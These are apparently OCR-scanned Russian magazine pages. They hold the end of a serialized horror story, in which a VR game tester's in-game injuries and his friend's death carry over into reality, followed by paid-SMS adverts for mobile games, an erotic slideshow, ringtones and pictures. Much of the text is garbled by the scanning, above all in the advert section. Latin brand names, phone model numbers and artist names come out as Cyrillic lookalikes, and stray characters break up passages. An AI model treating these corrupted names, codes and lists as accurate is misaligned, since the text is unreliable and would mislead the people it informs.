го общего с теми громоздкими шлемами, которые использовали 20 лет 
назад. На правом ободке значилась крохотная подпись: «ѴВІ». Как ему 
объяснили, очки были собственной разработкой компании, и будут пос- 
тавляться вместе с 0\Ю-игрой. Нужно было только установить для них 
драйвера, и можно начинать играть. Процесс инсталляции был стандарт- 
ным и много времени не занял. Когда все закончилось, Андрей поудоб- 
нее уселся в свое старенькое кресло, надел очки и запустил загрузчик. 
Не было ни меню, ни заставок — ничего. Только руины какой-то древ- 
ней крепости, посреди которых он находился, с удивлением оглядыва- 
ясь по сторонам. Прорыв, который сделали парни из «ВРИ», оказался 
колоссальным. Все: небо, деревья, разрушенные камни, олененок, с лю- 
бопытством глядящий на него, — поражало реалистичностью. Он поша- 
рил пальцами по клавиатуре, пытаясь отыскать управление. Разработ- 
чики не стали мудрить и оставили стандартную ѴѴАЗО-раскладку. Толь- 
ко вот непонятно, кем ему доводилось играть. Андрей привык, что в иг- 



рах такого рода в начале нужно выбирать себе персонажа, формиро- 
вать ему внешность, имя и прочие атрибуты. Здесь он просто был собой. 
Невдалеке виднелась протоптанная дорога. Выйдя на нее, Андрей заме- 
тил указатель. Стрелка направо указывала на «Хойлу», налево — в ка- 
кой-то «Чикизан». Названия ничего ему не говорили, поэтому он выбрал 
наугад правую сторону и побрел по дороге, надеясь встретить каких-ни- 
будь разумных существ. 

В компании ему ничего не сказали о целях игры, об обитателях и зако- 
нах мира Мезы. Единственное, что он узнал, — этот мир опасен. И если 
твоего героя в нем убьют, следующие 24 часа ты не сможешь зайти в 
мир. Наверное, это ограничение ввели, чтобы игроки были осторожнее 
и ценили жизнь внутри. Впрочем, Андрей не сомневался, что опыт, по- 
лученный в ММОВРО и в других онлайновых мирах, поможет ему избе- 
жать любые проблемы. 

Через какое-то время пешей прогулки, он увидел впереди облако пыли. 
Андрей попытался разглядеть что-то, но смог это сделать только тогда, 
когда источник пыли приблизился. Прямо на него во весь опор скакал 
рыцарь, облаченный в латы. Теперь Андрей, по крайней мере, знал, что 
попал в какой-то средневековый мир. Он попытался сообразить, что 
сказать всаднику. В голове теснилось так много вопросов, но он не был 
даже уверен, что тот захочет что-то объяснять. Или, вообще, поймет его. 
Тем временем рыцарь приблизился совсем близко. Андрей сдвинулся к 
краю дороги и жестом попросил остановиться, но всадник и не думал за- 
медлять ход. А когда они поравнялись, Андрей заметил, что в его руках 
появилось копье, направленное прямо на него. 

А затем наступила тьма. 

Андрей сорвал с себя очки и взглянул на экран. Ни всадника, ни дороги 
на нем не было — только привычный рабочий стол. Игра закрылась и, 
сколько Андрей ни клацал на иконку, не думала запускаться. Дурацкое 
ограничение! Могли бы снять для бета-тестеров. Вместо того чтобы де- 
лать свою работу, приходилось тупо ждать. Да и как он мог так подста- 
виться. Ребенок бы понял, что от несущегося на тебя всадника с копьем 
наперевес, ничего хорошего ждать не стоит. Ну ничего, в следующий 
раз он будет осторожнее. 

Внезапно Андрей почувствовал усиливающееся жжение в области гру- 
ди. Он почесал это место, но жжение только усилилось. Тогда он при- 
поднял футболку... 

Как раз на том месте, куда должна была угодить пика рыцаря, был боль- 
шой фиолетовый синяк. 

* * * 

Весь день Андрей провел, маясь от досады, что не может вернуться в 
мир и разобраться с обидчиком. Он даже написал письмо во «ВРИ», 
поинтересовавшись, можно ли как-нибудь снять ограничение. Но до 
вечера ему никто так и не ответил. Когда стемнело, Андрей решил схо- 




дить на улицу в кои-то веки прогуляться, заодно купить продуктов. 
Жжение в груди прошло, чего не скажешь о синяке. Андрей был доста- 
точно здравомыслящим человеком, чтобы не причислять это к мисти- 
ке. Вероятно, во время игры слишком увлекся и не заметил, как уда- 
рился об угол стола. Он не знал, как мог сразу не заметить боли, но 
другого объяснения не было. Не мог же персонаж компьютерной игры 
ранить его на самом деле? 

Свежий уличный воздух проветрил голову, и думать стало легче. 
Москва погружалась в огни. Даже здесь, вдалеке от центра, повсю- 
ду горели яркие витрины и вывески. Люди спешили домой после ра- 
бочего дня и, глядя на них, Андрей подумал, насколько сильно их 
жизнь отличается от его собственной. Вряд ли они могли понять 
его. Глядя на него, сидящего месяцами за монитором и ни с кем не 
разговаривающего, они бы посчитали, что он глубоко несчастен и 
одинок. Но это было не так. Андрей жил не в квартире, не в Моск- 
ве, он жил в онлайновых мирах, которые были ему намного инте- 
реснее. И когда он выходил на улицу, то ощущал себя в чужой ре- 
альности. В мир, приносящий только дискомфорт и желание поско- 
рее выбраться из него. 

Размышляя об этом, Андрей внезапно почувствовал на себе чей-то 
пронзительный взгляд. Он слышал о таком, когда ты не видишь, но 
всем телом ощущаешь, как кто-то смотрит на тебя. Не просто так. Наб- 
людает. Выжидает. Сам он этого раньше никогда не испытывал, но сам 
собой дискомфорт возникнуть не мог. Обернувшись, Андрей осмотрел 
все вокруг. Ничего подозрительного. Обычные люди, проходящие ми- 
мо по своим делам, разве что мельком обратившие внимание на оста- 
новившегося посреди улицы парня. 

Андрей пошел дальше и, дойдя до конца переулка, зашел в продукто- 
вый магазин. Но и здесь тревожное чувство не покидало его. 

— Батон «Нарезного», колу, килограммовую пачку пельменей «Колпи- 
нские» и 2 пиццы «Дока», — обратился он к новенькой продавщице, ко- 
торую здесь раньше не видел. 

Девица усмехнулась и принялась доставать продукты. Что-то в ней каза- 
лось неправильным, но что именно, Андрей не знал. Просто чувствовал. 

— 236 рублей 70 копеек, - сообщила продавщица. 

— Андрей положил продукты в сумку и, провожаемый ее усмехающим- 
ся взглядом, вышел из магазина. 

Через 20 шагов он понял в чем дело. Одежда! Она была одета не как 
продавщица. И ее бежевый костюм он уже где-то видел. И тут же 
вспомнил где. Людмила! Это, конечно, могло быть совпадением, мало 
ли женщин в Москве ходят в таком костюме. Но почему продавщица 
стала бы его надевать? Это казалось до того нелепым, что Андрей по- 
вернулся назад и, сам не понимая зачем, вернулся в магазин. Вместо 
той девицы за прилавком стояла давно знакомая тетенька в обычной 
рабочей одежде с фартуком. 



— Скажите, а где продавщица, которая отпускала 5 минут назад? 

— 5 минут, как и 5 часов назад, отпускала только я. 

— Но я только что покупал у нее продукты. 

— Вы, молодой человек, наверное, ошиблись магазином. 

Сбитый с толку Андрей, возвращался домой. Ошибиться он, конеч- 
но, не мог. Так что оставался только один вариант - тетка ему вра- 
ла. Но зачем? 

Подходя в дому, Андрей заметил, что в окне его квартиры горит свет. 
Он мог поклясться, что выключал его перед уходом. 



Он оказался совершенно в другом месте. Это был какой-то пещер- 
ный город, окутанный сумерками и сыростью. Повсюду сновали оде- 
тые в тряпье и шкуры люди. Грязные, суетливые, они напоминали 
муравьев, которые хаотично передвигаются по муравейнику. Внеш- 
не они были совершенно нормальными, только кожа у всех чрезмер- 
но бледная, а мужчины все как один - с бородами. На Андрея никто 
не обращал внимания. 

— Скажите, где я нахожусь? - спросил он у пробегавшего мимо человека. 

Тот совершенно дикими глазами посмотрел на чужака и, не ответив, 
ринулся дальше. 

Вторая и третья попытки заговорить с туземцами тоже не увенчались 
успехом. Тогда Андрей решил исследовать пещеры. 

Стенки гротов были гладкими, как будто их кто-то специально отшли- 
фовывал, вдоль коридоров через небольшие промежутки горели фа- 
келы. Также повсюду были видны надписи на непонятном языке. По- 
хожие на иероглифы, но с изображением уродливых человечков. Ко- 
ридоры гротов периодически сменялись широкими залами, где толпи- 
лись пещерные люди и делали какую-то работу. Долбили камни, вы- 
чесывали шкуры животных... они как будто сошли со страниц школь- 
ных учебников по истории, где рассказывалось о древних людях во СО 
времена мамонтов. Только жили они под землей, а не на поверхнос- ^ 
ти. Как глубоко — Андрей не знал, как и не знал где выход. Он попы- 
тался снова обратиться к местному жителю, но люди от него шараха- 
лись как от чумного. Краем глаза он видел, как они тайком шушука- 
ются между собой, глядя на него. 

Когда Андрей уже устал петлять в лабиринтах и присел отдохнуть на 
испещренный иероглифами валун, к нему подошли двое туземцев и 
стали активно жестикулировать, выкрикивая непонятные фразы. Они 
были похожи на пещерных полицейских: на груди носили знак в виде о 
трехконечной звезды, а за поясом носили короткие каменные дубинки § 

— Хрува даха, мулго то, ну! - усердствовал один из них, показывая на -- 

Андрея и затем на камень. о. 

Андрей жестами объяснил, что не понимает. * 

— Ну! Ну! Гата! - повторил пещерный полицейский и Андрей понял, 



* * * 



КРЕАТИФФ 




КРЕАТИФФ 




что, присев здесь, он совершил что-то нехорошее. После того как он 
встал, туземец приказал следовать за ним. 

Шли они достаточно долго, и по пути Андрей успел понаблюдать за 
здешней жизнью. Как он понял, разные залы служили для разных це- 
лей. В одном Андрей распознал базарную площадь, в другом - игорное 
заведение. Чем дальше, тем проход становился просторнее и ухожен- 
нее. В конце концов троица оказалась в огромном холе, заполненном 
сталактитами и сталагмитами. Вместо дальней стены над ними возвы- 
шались бетонные ворота с выдолбленными на них фигурками мифи- 
ческих животных. У ворот стояли десятки туземцев. Одни охраняли 
вход с каменным оружием в руках, другие держали толстые веревки, 
прикрепленные к вратам. Когда Андрей с конвоем подошли, приврат- 
ники потянули веревки, и гигантские дверцы стали медленно, с громы- 
ханием, открываться. 

Глазам Андрея открылся просторный зал, украшенный колоннами и 
статуями. В конце его на троне сидел человек в окружении слуг. Пра- 
витель этого места. 

Полицейские подтолкнули пленника ко входу и удалились, их сменили 
туземцы, стоявшие у врат изнутри. Они подвели Андрея на безопасное 
расстояние к своему королю и стали по бокам, готовые в любую минуту 
наброситься на него, если чужак сделает какую-то глупость. 

— Приветствую, владыка. Я пришел с миром! - сообщил Андрей, вспом- 
нив обращения к королям из фэнтези-книг. 

Пещерный король был крупнее всех остальных жителей, весь в белых 
мехах, подчеркивающих его положение. На нем не было короны, но 
лицо закрывала маска, украшенная такими же иероглифами, какие 
Андрей видел на стенах. 

— С миром, говоришь, чужеземец? - воскликнул человек на троне. 
Андрей облегченно вздохнул. Хоть кто-то в этом месте его понимает. 

— Зачем тогда ты пытался осквернить «Камень Памяти»? 

^ — Не знал я, владыка, что это «Камень Памяти». Иначе не посмел бы. 

(О — Кто ты и как попал ты в мои владения? 

— Зовут меня Андрей. А как попал — для меня самого загадка. 

— Никто не может оказаться в подземном царстве Каменойл случайно. 
Отвечай мне! - грозный голос короля показался Андрею знакомым. 

— Не гневайтесь, правитель. Я впервые в этих землях и заблудился. 

— Ты знаешь, какая судьба постигала твоих предшественников? 

— Не знаю, правитель, - ответил Андрей, хотя догадывался, что ничего 
хорошего их здесь ждать не могло, 
о — Неминуемая, мучительная смерть. У тебя есть единственная возмож- 

” ность избежать ее — выдать истинную причину своего появления здесь! 

т- Иначе пеняй на себя. 

^ — Но, владыка, я действительно оказался здесь по чистой случайности, 

* и, увидев, как искривилось от гнева лицо подземного правителя, Андрей 
21, понял, что совершил ошибку. Но было уже поздно. 



Король на туземном языке что-то приказал своим слугам, показывая на 
пленника, и они тут же скрутили его руки. 

— Ты будешь казнен. Немедленно. 

Но так просто Андрей сдаваться не собирался. В нем тоже просну- 
лась злость, оттого что никто даже не собирался выслушать плен- 
ника, не говоря уже о том, чтобы оказать ему радушный прием. 
Злость прошлась по всему телу, и Андрей ощутил в изменения в 
нем. На лицах туземцев появились удивление и ужас: они смотрели, 
как тело пленника принялось источать красный свет, а вместе с ним 

— жар. Охранники, только что державшие его за руки, рухнули на 
пол и корячились от боли, их перчатки дымились и источали запах 
паленой кожи. 

Андрей не собирался убивать своих обидчиков. Но остановить проснув- 
шуюся в нем силу не мог. Люди, находящиеся в зале, падали один за 
другим, охваченные пламенем. Последним на полу оказался подзем- 
ный король. Жар, исходящий из тела Андрея, тут же спал. Он подошел 
к трону, перевернул владыку на спину и снял с него маску. 

На него мертвыми глазами смотрел его лучший друг Жорик. 

* * * 

Андрей сорвал с себя очки. 

— Какого черта? - выругался он. Это было бессмысленно. Каким обра- 
зом «ВРИ» могла воспроизвести в Мезе образ его друга? Можно было 
допустить, что Жорика тоже каким-то образом оказался в команде тес- 
теров и попал в этот мир, но почему он вел себя так, как будто они не 
знакомы? Они вдвоем играли во множество игр, даже познакомились 
много лет назад в Ыпеаде 2. И всегда путешествовали вместе, помогая 
друг другу... 

Лучшим способом все узнать, было позвонить самому Жорику. 

Андрей набрал номер его мобильника, но телефон молчал. В аське его 
тоже не было. Андрей продолжал звонить. Наконец, на 6-й раз ему от- 
ветил рыдающий голос матери друга. Андрей смутился, услышав 
всхлипывания, но спросил: 

— Здравствуйте. А Жору можно? 

Слова посыпались непрерывным потоком, и Андрей с трудом пытался 
разобрать, что пытается ему сказать женщина. 

— Он сид..дел, куш. .шал на кухне, п.. потом... Я н..не знаю. Он п.. прос- 
то стал гореть на г.. глазах. К.. кожа зап.. пузырилась. Господи, да что же 
это? - рыдала женщина. - Андрюша, это ты? Ой г.. горе-то. Я скорую 
вызвала, с. .сейчас приедут. Господи помилуй! 

Андрей сбросил разговор и в какой-то прострации посмотрел на экран 
с застывшим на нем тронным залом. В этот момент в коридоре кварти- 
ры, тихо скрипнув, открылась входная дверь. 

Продолжение следует © 





Код загрузки: 31189 

Над миром вновь нависла угроза подземного мрака, 
мертвецы встали из своих могил, чтобы очистить землю от 
живых, ими движет вечный голод и чья-то злая воля. 



Тебе предстоит спасти человечество от порождений тьмы. 
Путь героя непрост, его подстерегают опасные приключения 
и сложные задания, но отважные воины готовы 
присоединиться к твоей армии, а те, кто на светлой стороне, 
укажут правильный путь. Магия и артефакты надежно 
послужат тебе. Спаси мир от нечисти! 



Список телефонов, на которых можно играть: І.С С1100, Р2100, 65400, 65500, 67000А, 67030, 67050, 67100; Моіогоіа С380, С390, 
С650, Е1000, ЕЮбб, Е1120, Ѵ180, Ѵ188, Ѵ220, Ѵ300; ІЧокіа 26&, 3100, 3120, !3200, 32>0, 323Й, 3300, 3650, І660, 5100. 5140, 5140І, 
6020, 6021, 6030, 6100, 6101, 6108, 6170, 6200, 6220, 6230, 6230І.6260, 6600, 6610, 6610І 6620, 6630, 6670, 6680, 6681, 6682. 6800, 
6810, 6820, 6820а, 6822, 7200, 7210, 7250,72501. 7260, 7270, 7600,7610, 7650, 8800, 8801, ІЧ-Саде.И-Саде-оЬ, Задет Му Ѵ65; 
Затзипд СЮ0.С1Ю, С200. С2Ю. 10410, Ц500, ЕЮО. ЕЗОО. Е330, Е600, Е610, Е630, Е700, Е710, Е715.Е720, Е800, Е810, Е850, Р400, 
Р700, Р730, 5100, 5300, ХЮ0, Х120, Х140, Х400, Х450, Х460, Х480, Х600. Х610, Х640; 5Иагр СХ-Е30, СХ10, СХ15, СХ20, СХ25, СХЗО, 
6X32; Зіетепз А65, С60, С65, СѴ65, СХ65, СХ70, СХ75, М55, М65, М75, МС60, 555, 565, 5К65, 5155, 5165, 5X1; 5опу Егісззоп Ц750І, 
Е5001, Ш0І, Б00І, КЗООі, К500І, К600, К700І, К750І, 5600, Т610, Т630, Ѵ800, ѴѴ800, 21010, 2520, 2600, 2800 



Яігіііг 




Код загрузки: 31190 

Самая веселая бродилка для мобильных телефонов позволит 
Вам погрузиться в борьбу с коварным диктатором. Остановите 
безумца и его солдат. Помогите разведчику собрать все 
тайны и секретные бумаги. 



” Скучать не придется, ведь предстоит пройти 15 уроі 
V 3 совершенно разных мирах, протя-женностью боле 



, івнеи в 
юлее 300 



экранов. Горы разнообразных противников, мощное оружие 
для их уничтожения и отличная физика игрового движка - 
вот чем отличается "Зйгіііг" от других подобных игр. 



Список телефонов, на которых можно играть: І.С С1100. 65400, 65500, 67000А, 67030, 67050, 67100; Моіогоіа С380, С390, С650, 
Е1000, ЕЮбб, Е1120, Е398, Е550, КаггѴЗ. Ѵ180, Ѵ188, Ѵ220, Ѵ300, ѴЗЗО, Ѵ400, Ѵ500, Ѵ525, Ѵ535, Ѵ545, Ѵ547, Ѵ550, Ѵ551, Ѵ555, Ѵ600, 
Ѵ620, Ѵ635, Ѵ80; ІЧокіа 2650, 3100, 3120, 3200, 3220, 3230, 3300. 3510і, 3530, 3650, 3660, 5100, 5140, 5140І, 6020, 6021, 6030, 6100, 
6101, 6108, 617б, 6200, 6220, 6230, 62301, 6260, 6600, 6610, 6610і, 6620, 6630, 6670, 6680, 6681, 6682, 6800. 6810, 6820. 6820а, 6822, 
7200, 7210, 7250, 72501, 7260. 7270, 7600, 7610, 7650, 8800, 8801, 8910І, И-Саде, І\І-Саде-СЮ; Затзипд СЮО, СІЮ, С200, С210, МІО, 
0500, ЕЮО, ЕЗОО, ЕЗЗО, Е600, Е610, Е630, Е700, Е710, Е715, Е720, Е800, Е810, Е820, Е850, Р400, Р700, Р730, 5100, 5300, Х100, Х120, 
Х140, Х400, Х450, Х460, Х480, Х600, Х610, Х640; ЗИаго 6Х-Е30, 6X10, 6X15, 6X20, 6X25, 6X30, 6X32; Зіетепз А65, С60, С65, 0/65, 
СХ65, СХ70, СХ75, М55, М65, М75, МС60, 555, 565, 5К&5, 51_55, 5165, 5X1; Зопу Епсззоп О750І, Р5001, Ш0І, 1300І, КЗООі, К500і, К600, 



К700І, К750І, 5600, 5700І, Т610, Т630, Ѵ800, ѴѴ800, 21010, 2520, 2600, 2800 

Алеша Попович и Тугарин Змей Код загрузки: 31187 

Веселая история, где есть место приключениям Алеши и 




его друзей, любви главного героя и красавицы Любавы, по 
■ мотивам мультфильма "Алеша Попович и Тугарин Змей . И 
вечно Алеше старается помочь говорящий конь Юлий. 



Ц Тугарин Змей похитил красавицу Любаву. Чтобы спасти от 
любовь, Алеше Поі 



злого Тугарина свою любовь, Алеше Поповичу придется 
преодолеть множество препятствий и ловушек, победить 
всех врагов и прислушиваться к советам друзей. 



Список телефонов, на которых можно играть: 1.6 С1100, Е2100, 65400, 65500, 67000А, 67030. 67050, 67100; Моіогоіа С380, С390, 
С650, Е1000, Е1060, Е1120, Е398, Е550, КаігѴЗ. Ѵ180, Ѵ188. Ѵ220, Ѵ300, ѴЗЗО, Ѵ400, Ѵ500. Ѵ525, Ѵ535, Ѵ545, Ѵ547, Ѵ550, Ѵ551, Ѵ555, 
Ѵ600, Ѵ620, Ѵ635, Ѵ80; ІЧокіа 2650, 3100, 3120, 3200, 3220. 323(1 3300, 3510І, 3530, 3650, 3660, 5100, 5140, 6020, 6021, 6100, 6101, 
6108, 6170, 6200, 622б, 6230, 6230І, 6260, 6600, 6610, 6610і, 662(1 663б, 6650, 6670, 6680, 6681, 6682, 6800, 6810, 6820, 6822, 7200, 
7210, 7250, 7250і, 7260, 7270, 7600, 7610, 7650, 8910І, Ч-баде, ІЧ-баде-дЦ; Задет Му Ѵ65; Затзипд СЮО, СІЮ, С200, С2Ю, МЮ, 
Ц500, ЕЮО, ЕЗОО, Е330, Е600, Е6Ю, Е630, Е700, Е7Ю, Е715ТЕ720, Е800, Е8Ю, Е820, Е850, Р400, Р700, Р730, 5100, 5300, ХЮ0, Х120, 
Х140, Х400, Х450, Х460, Х480, Х600, Х6Ю, Х640; ЗИаго 6Х-Е30, 6X10. 0(15, 6X20, 6X25, СХЗО, СХ32; Зіетепз А65, С60, С65, СѴ65, 
СХ65, СХ70, СХ75, М55, М65, М75, МС60, 555, 565, 5К65, 5155, 5165, 5X1; Зопу Епсззоп Ц750І, Р5001, 1300І, КЗООі, К500І, К600, К700І, 
К750І, 5600, 5700І, Т6Ю, Т630, Ѵ800, ѴѴ800, 2500І, 2520, 2600, 2800 



Бумер 



Код загрузки: 31186 




...По ночным улицам Москвы мчится черный ВМѴѴ, уходящі/ 
от погони. Цепь роковых событий с разборками и стрельбой 



поставила четырех героев - четырех друзей - вне закона. И 
і жизни без правил им нет пути назад... 



Тебе предстоит уходить от погони, сопровождать 
дальнобойщиков, встревать в разборки и отстреливаться. 
Даже на дороге, которую лучше не выбирать, приходится 
постоянно доказывать, что круче тебя нет никого. А как 
это сделать - вспоминай фильм, он будет самой лучшей 
подсказкой. 

Список телефонов, на которых можно играть: 1.6 С1100, 65400, С5500, С7000А, 67030, С7050, 67100; Моіогоіа С380, С390, С650, 
ЕЮОО, Е1060, Е1120, Ѵ180, Ѵ188, Ѵ220: ІЧокіа 2650, 3100, 3120, 3200, 3220, 3230, 3300. 3650, 3660, 5100, 5140, 5140і, 6020, 6021, 
6030, 6100, 6101, 6іб8. 61>0, 62б0, 62І0, 6230, 623бі, 62б6, 660б, ббіб, ббібі. 662б, 663б, 667б, 668Й, 668І, 668І, 6800, 6810, 6820, 
6820а, 6822, 7200, 7210, 7250, 72501, 7260, 7270, 7600, 7610, 7650, 8800. 8801, ІЧ-бадеЛЧ-баде-оЬ' Затзипд СЮО, СІЮ, С200, С2Ю, 
МЮ, Ц500, ЕЮО, ЕЗОО, ЕЗЗО, Е600, ЕбЮ, Е630, Е700. Е710, Е715, Е720, Е800, Е810, Е820, Е850, Р400, Р70(Х Р730, 5100, 5300, ХЮ0, 
Х120, Х140, Х400, Х450, Х460, 5СН-Х480, Х600, Х6Ю, Х640; ЗИаго СХ-ЕЗО, СХЮ, СХ15, СХ20, СХ25, СХЗО. СХ32; Зіетепз А65. С60, 
С65, СѴ65, СХ65, СХ70, СХ75, М55, М65, М75, МС60, 555, 565, 5К65, 5155, 5Ь65, 5X1; Зопу Егісззоп Р5001, 12ЮІ, 1300І, КЗООі, К500І, 
К600, К700І, К7501, 5600, Т6Ю, Т630, Ѵ800, ѴѴ800, 21010, 25001, 2520, 2600, 2800 

Код загрузки: 31318 

90-е годы XX века. Время не просто криминала, а полного 
беспредела. Эпоха стрелок, нарядов от Версаче и 
шестисотых мерсов. Ваш босс влез в очередную череду 
разборок, а разбираться приходиться вам... 



Жмурки 




В игре много узнаваемых моментов из одноименного фильма. 
Черный юмор, которого предостаточно и в фильме, есть и в 
игре. Морг, лаборатория, улица, квартира - везде вас ждут 
беспощадные противники, которые понимают только один 
аргумент - силу оружия. Объясните им, кто рамсы попутал и 
за базар отвечать бу^ ■" 



базар отвечать будет. Главное, самому не зажмуриться... 

і: ІЧокіа 2650, 



6600, 6610, 66101, 6620, 6630, 6670, 6800, 6810, 6820, 6820а, 6822, 7200. >210, >250, >250і, >260, >610, >650, Й800, Й801, 89ЮІ, И-Саде, 
Ч-СадеОЭ; Затзипд СЮО, СІЮ, С200, ЕЮО, ЕЗОО, ЕЗЗО, Е600, Е630, Е700, Е7Ю, Е715, Е720, Е800, Е810, Е820, Е850, Р400, 5100, 
300, ХЮ0, Х450, Х460, Х480, Х600, Х6Ю, Х640; Зіетепз А65, С60, С65, СХ65, СХ70, СХ75, М55, М65, М75, МС60, 555, 565, 5К65, 5155, 



І\І- 



5Ь65, 5X1; Зопу Егісззоп 6750І, Р500І, К500І, К600, К700І, К750І, Ѵ800, ѴѴ800, 21010, 2800 

Киззіап 8Ьаг - Кгузііпа 

Киззіап , , а . 

Кристина из России. Вы будете потрясены ее красотой, Вы 




Код загрузки: 31319 

5ІЖ5. Волнующая и обаятельная супермодель 
Вы бу; Пі ■ 



не сможете противостоять ее страсти, Вы будете очарованы 

ѵ. ѵ. бу/ . 



ее соблазнительной фигурой. Сегодня она будет позировать 
специально для Вас. 



Риззіап Зіагз - это великолепное качество слайдов, 
волшебное шоу соблазнов с беспрецендентно удобным 
управлением и великолепными возможностями. 
Соблазнительная и волнующая русская супермодель 
Кристина силой своей страсти очарует Вас. 



Список телефонов, на которых можно играть: ЬС С1100, С1600, 61610, 65400, 65500, 67000, 67030, 67050, 67100; Моіогоіа С380, 
С650, ЕЮ00, ЕЮ60, Е1120. Е398, Е550. РалѴЗ, Т720, Т720І, Т722, Т722і, Ѵ180, Ѵ188, Ѵ220, ѴЗОО, Ѵ400, Ѵ500, Ѵ535, Ѵ545, Ѵ547, Ѵ550, 
Ѵ551, Ѵ555, Ѵ600, Ѵ620, Ѵ80; ІЧокіа 2650, 3100, 3120, 3200, 3220, 3300, 3510і, 3530, 3650, 5100, 5140, 5140і, 6020, 6021, 6030, 6100, 
6108, 6110, 6170, 6200, 6220, 6230, 6230І, 6260, 6600, 6610, 66ЮІ, 6620, 6630. 6800. 6810, 6820, 6820а. 6822. 7200, 7210, 7250, 7250І, 
7260, 7600, 7610, 7650, 8800, 8801, 89ЮІ, Ц-Саде, І\І-Саде-ф; Затзипд СЮО, СІЮ, С200, МЮ, Ц500, Е700. Е710, Е720, Е800, Е8Ю, 
Е820, Е850, Р400, Р730, 5100, 5300, ХЮ0, Х120, Х400, )Й50, Х460, Х480Д600, Х6Ю; ЗИагр 6Х-Е30, ©СО, ©СО, СХ32; Зіетепз С60, 
С65, СЕ62, СХ65, СХ70, М55, М65, МС60, 555, 51_55, 5165, 5X1; Зопу Егісззоп Е500І, К500І, К700І, ТбЮ 



Инструкция по закачке: 

1) Создайте 5М5-сообщение, в котором укажите код^ загрузки игры; 

2) Отправьте созданное 5М5-сообщение на короткий номер 9955*; 

3) Дождитесь прихода ответного 5М5-сообщения, содержащего ссылку на 
игру; 

4) Используя ѴѴАР браузер Вашего телефона, перейдите по полученной 
ссылке и осуществите загрузку и установку выбранной Вами игры. 

Стоимость игры: $2.5/75 руб. (без НДС) 



9955 



* для абонентов «Мотив» 
короткий номер 6655 




Больше ПОДАРКОВ хороших и разных 



Подари своей девушке ее любимую мелодию! 
Отправь другу прикольную картинку! 



Просто укажи в згпБ-сообщении после кода заказа номер телефона. 
Например: ХХХХХ 79011234567, где ХХХХХ код картинки или 
мелодии, а 79012345679 полный номер телефона. В качестве подарка 
ты можешь отправлять мелодии, картинки, іаѵа-игры или гороскопы. 



Стоимость услуги и короткий номер соответствует выбранному сервису. 
Например: Мелодии - 0,75 у.е., зтз на номер 9922. Іаѵа-игры - 2,5 у. 
5ГТ15 на номер 9955. Гороскопы - 0,15 у.е., зтз на номер 9988. 

Вы не можете делать подарки абонентам Билайна. 



Цветные картинки 



Больше 




йИГі^И 



31270 31271 31305 31275 31310 31273 




31320 31288 31304 31287 31321 31312 





31285 31286 31313 31314 31332 31333 




01 “ 



Т 




31335 31334 31331 31325 31326 31278 




Мелодии 



Исполнитель / Название 


Полифония 


(ІЧокіа) 


Монофония 

(Зіетепз) 


(ЕМ5) 


Акоп / І_опеІу ічеѵѵ 


31175 


3117501 


3117503 


3117502 


Агазіі / Тіке Тіке Кагсіі 


31267 


3126701 


3126703 


3126702 


АхеІ Р / С гагу Ргод 


31161 


3116101 


3116103 


3116102 


ЦаѵісІ СиеНа / ТІіе ѴѴогІсІ із Міпе 


31163 


3116301 


3116303 


3116302 


СогіІІаг / РееІ СоосІ Іпс. 


31169 


3116901 


3116903 


3116902 


Сѵѵеп Зіеі'апі / СооІ ЩЧІ; 


31166 


3116601 


3116603 


3116602 


МоЬу / Ш Ме Цр 


31172 


3117201 


3117203 


3117202 


Тіто Мааз & Вгіап Моіко / Рігзі: Оау 


31164 


3116401 


3116403 


3116402 


Ц.1 NN & Х-тосІе / Апітаіз 


31173 


3117301 


3117303 


3117302 


Ыео-Мазіег/ Прогноз погоды 


31268 


3126801 


3126803 


3126802 


Билан Дима / Как хотел я №«1 


31162 


3116201 


3116203 


3116202 


Братья Гримм / Ресницы 


31167 


3116701 


3116703 


3116702 


Венгеров 8і Федорофф / Кавказская пленница 


31174 


3117401 


3117403 


3117402 


Гости из будущего / Я знаю только лучшее... 


31170 


3117001 


3117003 


3117002 


Зацепин Антон / Улетаю 


31171 


3117101 


3117103 


3117102 


Корни / 25 Этаж 


31165 


3116501 


3116503 


3116502 


Маликов Дмитрий / С чистого листа 


31269 


3126901 


3126903 


3126902 


Фактор 2 / Красавица ИШ 


31168 


3116801 


3116803 


3116802 



Звуки 



Только для телефонов: Затзипд - все многоголосные модели, 
АІсаЬеІ 535/735, ЗопуЕгісззоп - все многоголосные модели, 
ІЧокіа 3650/3660/7650/6600/6230/14 -Саде, Задет МуХ. 



Индейские барабаны 


31176 


Демонический смех 


31180 


Звонок старого телефона 


31177 


Звук модема 


31184 


Гром 


31183 


Женский оргазм 


31182 


Голос робота 


31179 


"Маіітап, Ѵои’ѵе до! ІІіе теззаде" (голос) 


31181 


Радостный смех 


31178 


Р**к уои (голос) 


31185 



Инструкция 



Для абонентов: МТС, «Билайн», «Мегафон», Теле2, Цифровая Экспансия, 
Байкалвестком, Енисейтелеком, Индиго (Коми, В. Новгород, 
Архангельск), «Мотив», НТК, Астрахань-СЗМ, Ярославль-СЗМ, 
Ульяновск-СЗМ, Уралсвязьинформ, ОІ\І (Татмнком-Т), ОІЧ-С5М 



Для получения мелодии или картинки пошлите ЗМЗ-сообщение, содержащее код на короткий номер 9922 (* для 
абонентов «Мотив» короткий номер - 6622). Вам придет сообщение, содержащее мелодию или картинку (либо ѵѵар- 
ссылку). Ссылка действительна в течение 24 часов. В случае ошибочного запроса, услуга будет считаться оказанной. 
Для получения полифонических мелодий, звуков или цветных картинок необходимо подключить услугу ѴѴАР/СРК5 у 
своего оператора. 

Полифонические мелодии доступны для многоголосных телефонов. 

Цветные картинки доступны для телефонов с цветным экраном. 

Монофонические мелодии доступны для телефонов ІЧокіа и Затзипд. 

ЕМ5-мелодии доступны для одноголосных телефонов: АІсаІеІ, Моіогоіа, Рапазопіс, Рапіесіі, РЫІІірз, Зіетепз, 
ЗопуЕгісззоп. 

СТОИМОСТЬ запроса у операторов Байкалвестком, Енисейтелеком - $0,6 (без НДС); МТС, «Билайн», «Мегафон», 
Теле2, Цифровая Экспансия, НТК - $0,75 (без НДС) (для игр - $2,5); Ярославль-СЗМ, Ульяновск-СЗМ, ОІЧ 



(Татмнком-Т), Индиго (Коми, Архангельск, В. Новгород) - 18 р\б. (без НДС); ОІЧ-С5М (Саратов), Астрахань-СЗМ, 
«Мотив», Уралсвязьинформ - 23 р\б. (без НДС) (для игр - 75 рѵблей). Входящие 5М5 - бесплатно. 



Служба поддержки тоЬіІе.зиррогШгеІах.ги. 

© ООО «Первое Музыкальное Издательство», «Ворнер/Чаппел», «АНО «НФА», МИ «Русский шансон», «Тухманов Д.Ф.», 
